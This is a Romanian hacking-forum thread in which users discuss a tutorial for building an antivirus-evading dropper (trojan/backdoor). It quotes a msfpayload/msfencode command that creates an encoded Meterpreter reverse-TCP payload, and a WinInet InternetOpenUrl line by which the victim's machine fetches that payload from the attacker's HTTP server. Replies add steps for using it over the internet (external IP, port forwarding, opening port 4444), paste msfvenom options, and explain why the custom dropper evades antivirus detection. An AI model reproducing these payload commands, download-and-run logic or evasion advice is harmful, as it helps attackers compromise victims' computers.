Jump to content
h4sh

Cum sa creezi un dropper(trojan,backdoor) nedetectabil.Contine si codul sursa.

Recommended Posts

Va salut! Zilele trecute am gasit un tutorial foarte interesant in limba romana.Explica pe indelete cum sa creati un trojan indetectabil. Din cate am citit,este vorba despre o metoda noua prin care payloadul este apelat de sistemul victimei prin intermediul unei conexiuni http la serverul de ascultare a hackerului.Diferenta consta in faptul ca nu este necesar ca payloadul sa ii fie trimis victimei.Contine si codul sursa.

Il putei citi de aici : Cum sa creezi un Dropper(trojan,backdoor) "aproape" perfect

Salutari!

Link to comment
Share on other sites

Metoda nu cred macar ca merge dupa cum am observat pe codul sursa si chiar daca ar merge numai local merge asa ceva pentru ca sa mearga de la distanta trebuie mai multe facute cum ar fii controlat ip cum ar fii no-ip

si ce ma spart este comanda asta

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R| msfencode –e x86/shikata_ga_nai –t raw –a x86 –b “x00\x0a\x0d” –c 3 x > /var/www/data.bin

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 corect meterpreter cu ip

LPORT=4444 R corect portul

msfencode –e x86/shikata_ga_nai –t corect codarea payload

raw –a x86 corect raw output arhitectura 32 biti

dar aicia este varza

–b “x00\x0a\x0d” incorect asa ceva folosesti numai la exploit development asta ineamna elimina bytearray bad characters (caractere rele dintrun cod binar)

De exemplu, caracterele \x0a si \x0d sunt, de obicei, marcate la fel de rau, deoarece acestea sunt Line Feed (LF) si carriage return (CR), \x00 este zero si deia il scoti si ma interb ce cauta asa ceva intrun payload tip backdoor

Si deja de aicia nu are rost sa incerc sau sa imi bat capul cu tema asta :)

Edited by neox
Link to comment
Share on other sites

Metoda nu cred macar nici nu merge dupa cum am observat pe codul sursa si chiar daca ar merge numai local merge asa ceva pentru ca sa mearga de la distanta trebuie mai multe facute cum ar fii controlat ip cum ar fii no-ip

Neox,ca sa mearga de la distanta tot ceea ce trebuie sa faci este sa-ti inaintezi adresa IP si sa deschizi porturile de ascultare.

De restul,asa cum ai citit,se ocupa conexiunea "http" si dropperul in cauza.

dar aicia este varza

–b “x00\x0a\x0d” incorect asa ceva folosesti numai la exploit development asta ineamna elimina bytearray bad characters (caractere rele dintrun cod binar)

-b ,folosit ca optiune de codare, de utilitatea <msfencode> nu are nici o legatura cu exploit developmentul,implicit nu inseamna a elimina bytearray bad characters asa cum spui tu.

-b ,"bifat" ca optiune in cazul utilitatii <msfencode> iti permite sa eviti folosirea anumitor caractere(asa cum stim antivirusii se folosesc de semnaturi(signatures) pentru a detecta potentialele amenintari).

Nu confunda "exploit developmentul" cu procesul de codificare :)

Cat despre erorile tale gramaticale poti sta linistit,sunt irelevante! :)

Link to comment
Share on other sites

Neox,ca sa mearga de la distanta tot ceea ce trebuie sa faci este sa-ti inaintezi adresa IP si sa deschizi porturile de ascultare.

De restul,asa cum ai citit,se ocupa conexiunea "http" si dropperul in cauza.

-b ,folosit ca optiune de codare, de utilitatea <msfencode> nu are nici o legatura cu exploit developmentul,implicit nu inseamna a elimina bytearray bad characters asa cum spui tu.

-b ,"bifat" ca optiune in cazul utilitatii <msfencode> iti permite sa eviti folosirea anumitor caractere(asa cum stim antivirusii se folosesc de semnaturi(signatures) pentru a detecta potentialele amenintari).

Nu confunda "exploit developmentul" cu procesul de codificare :)

Cat despre erorile tale gramaticale poti sta linistit,sunt irelevante! :)

Mai omule nu are cum sa mearga la distanta el da in payload ip intern ala merge numai local pentru ip extern trebuie controlat

root@kali:~# msfvenom -h

Usage: /opt/metasploit/msf3/msfvenom [options]

Options:

-p, --payload [payload] Payload to use. Specify a '-' or stdin to use custom payloads

-l, --list [module_type] List a module type example: payloads, encoders, nops, all

-n, --nopsled [length] Prepend a nopsled of [length] size on to the payload

-f, --format [format] Format to output results in: raw, ruby, rb, perl, pl, bash, sh, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war

-e, --encoder [encoder] The encoder to use

-a, --arch [architecture] The architecture to use

--platform [platform]

The platform of the payload

-s, --space [length] The maximum size of the resulting payload

-b, --bad-chars

  • The list of characters to avoid example: '\x00\xff' !!!!!!UITATE AICIA NU VB PROSTI

-i, --iterations [count] The number of times to encode the payload

-c, --add-code [path] Specify an additional win32 shellcode file to include

-x, --template [path] Specify a custom executable file to use as a template

-k, --keep Preserve the template behavior and inject the payload as a new thread

-h, --help

daca nu stiam nu ma bagam deci nu vb aiurea msfvenom -h iti livreaza tot ce se poate :)

-b, --bad-chars

  • The list of characters to avoid example: '\x00\xff'
Link to comment
Share on other sites

Mai omule nu are cum sa mearga la distanta el da in payload ip intern ala merge numai local pentru ip extern trebuie controlat

root@kali:~# msfvenom -h

Usage: /opt/metasploit/msf3/msfvenom [options]

Options:

-p, --payload [payload] Payload to use. Specify a '-' or stdin to use custom payloads

-l, --list [module_type] List a module type example: payloads, encoders, nops, all

-n, --nopsled [length] Prepend a nopsled of [length] size on to the payload

-f, --format [format] Format to output results in: raw, ruby, rb, perl, pl, bash, sh, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war

-e, --encoder [encoder] The encoder to use

-a, --arch [architecture] The architecture to use

--platform [platform]

The platform of the payload

-s, --space [length] The maximum size of the resulting payload

-b, --bad-chars

  • The list of characters to avoid example: '\x00\xff' !!!!!!UITATE AICIA NU VB PROSTI

-i, --iterations [count] The number of times to encode the payload

-c, --add-code [path] Specify an additional win32 shellcode file to include

-x, --template [path] Specify a custom executable file to use as a template

-k, --keep Preserve the template behavior and inject the payload as a new thread

-h, --help

daca nu stiam nu ma bagam deci nu vb aiurea msfvenom -h iti livreaza tot ce se poate :)

-b, --bad-chars

  • The list of characters to avoid example: '\x00\xff'

Pai mi se pare si normal sa foloseasca o adresa IP interna.Asa cum si el spune,este vorba de o demonstratie intr-o retea interna.Ce ai fi vrut?Sa mentioneze si IP-ul sau extern? :)

Sintaxa ce obliga sistemul victimei sa apeleze payloadul "data.bin":

HINTERNET OpenAddress = InternetOpenUrl(connect,"http://192.168.1.10/data.bin", NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0)

Pt. a functiona la exterior,asa cum spui tu,trebuie doar sa urmezi pasii:

1."http://192.168.1.10/data.bin" - Schimba adresa IP,in cazul de fata 192.168.1.10,cu adresa ta "externa";

2."Innainteaza" adresa IP interna a serverului tau de ascultare;

3."Deschide" portul 4444;

Link to comment
Share on other sites

Pai mi se pare si normal sa foloseasca o adresa IP interna.Asa cum si el spune,este vorba de o demonstratie intr-o retea interna.Ce ai fi vrut?Sa mentioneze si IP-ul sau extern? :)

Sintaxa ce obliga sistemul victimei sa apeleze payloadul "data.bin":

HINTERNET OpenAddress = InternetOpenUrl(connect,"http://192.168.1.10/data.bin", NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0)

Pt. a functiona la exterior,asa cum spui tu,trebuie doar sa urmezi pasii:

1."http://192.168.1.10/data.bin" - Schimba adresa IP,in cazul de fata 192.168.1.10,cu adresa ta "externa";

2."Innainteaza" adresa IP interna a serverului tau de ascultare;

3."Deschide" portul 4444;

Pai atuncia de ce o da in sf in tutorial, dupa ce se ma complic cu toate prostile pe care le face el cind poti sa faci un simplu paypload backdoor (de exemplu faci copie la calc si il retranscrie pe cel din windows) si tot asa cum restart windows se incarca cu windowsul si cu multihandler controlezi legatura dar nu rezolvi nimic pentru ca este local.

Tu nu incelegi o chestie cind folosesti multihandler din Metasploit tu nu ai cum sa contolezi ip extern ca sa faci asa ceva trebuie minumul inca 10 pasi care lipsesc din tutorial.

Nu vreau sa ma cert sau sa ne contrazicem dar ideia nu este noua sau complecta

si faza cu badchars tiam zis aicia dovedeste ca nu stie ce vb in tutorial daca nu crezi uitate si pe wikipedia cu badcahrs “x00\x0a\x0d” sa vezi pentru ce este .

Newline - Wikipedia, the free encyclopedia


Din articolul original

root@kali:~#msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 R| msfencode –e x86/shikata_ga_nai –t raw –a x86 –b “x00\x0a\x0d” –c 3 x > /var/www/data.bin
[*]x86/shikata_ga_nai succeded with size 342 (iteration=1)[*]x86/shikata_ga_nai succeded with size 369 (iteration=2)[*]x86/shikata_ga_nai succeded with size 396 (iteration=3)
Unde:

LHOST=192.168.1.10 – adresa IP a serverului ce initiaza mecanismul de ascultare;

LPORT=4444 – portul de ascultare;-e x86/shikata_ga_nai – tipul de encoder utilizat;

-c 3 – 3 bucle de codificare(loops);

data.bin – payload(backdoor);Urmatorul pas consta in crearea si initializarea unui server menit sa lanseze un mecanism deascultare a cererilor de conectare din partea clientilor(victimelor).

Pentru aceasta vom deschide oconsola Kali Linux si vom invoca <msfcli> astfel

si explicatia –b “x00\x0a\x0d” pauza

Deci eu cind am vazut faza asta mia dat de inceles ca nu are rost ca mai citesc mai departe si sa ma agit ca un Pepsi incearca tutorialul si tu sa vezi ce se intimpla .

Deja facem off topic :) multi de pe rst va ocupati cu Metasploit voi ce ziceti ?

Ce sa zic greselile mele de gramatica asta e ce sa fac :)

Edited by neox
Link to comment
Share on other sites

Neox chill! Nimeni nu s-a luat de greselile tale de gramatica deoarece suntem pe un forum care nu are nici o legatura cu gramatica :)

Cat despre complicatie...S-a "complicat" sa nu creeze un simplu backdoor,deoarece,asa cum stim,antivirusul ar fi detectat acel backdoor imediat,in momentul in care victima l-ar fi descarcat(ca sa nu mai mentionam si scanarile programate). "shikata_ga_nai" este intors practic pe toate partile de antivirusi din pricina numarului imens de skiddies sau lammeri sau numeste-i cum doresti care nu fac altceva decat sa petreaca 99.9(3) la suta din timpul lor jucandu-se cu encoderele metasploit ca mai apoi sa le "urce" pe VirusTotal pt. "verificare".E de stiut faptul ca toate aceste scannere online trimit posibilele amenintari creatorilor de antivirusi.

Cred ca a ales sa creeze un cod nou,in detrimentul unui backdoor,tocmai de aceea.Pt ca "antivirusii" nu il vor detecta ca amenintare tocmai datorita faptului ca e "simplu",nu prezinta "antecedente" si nici macar o linie de cod "malware". Dropperul nu face altceva decat sa apeleze un fisier,payload-ul, printr-o conexiune http.

Si cred ca tutorialul se refera strict la codul sursa prezentat si nu la pasii ce ar trebui urmati referindu-ne la meterpreter sau cum sa stabilesti o sesiune meterpreter si nici la pasii aferenti.Le-ar da "mura in gura" lammerilor nu?! :)

Edited by h4sh
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...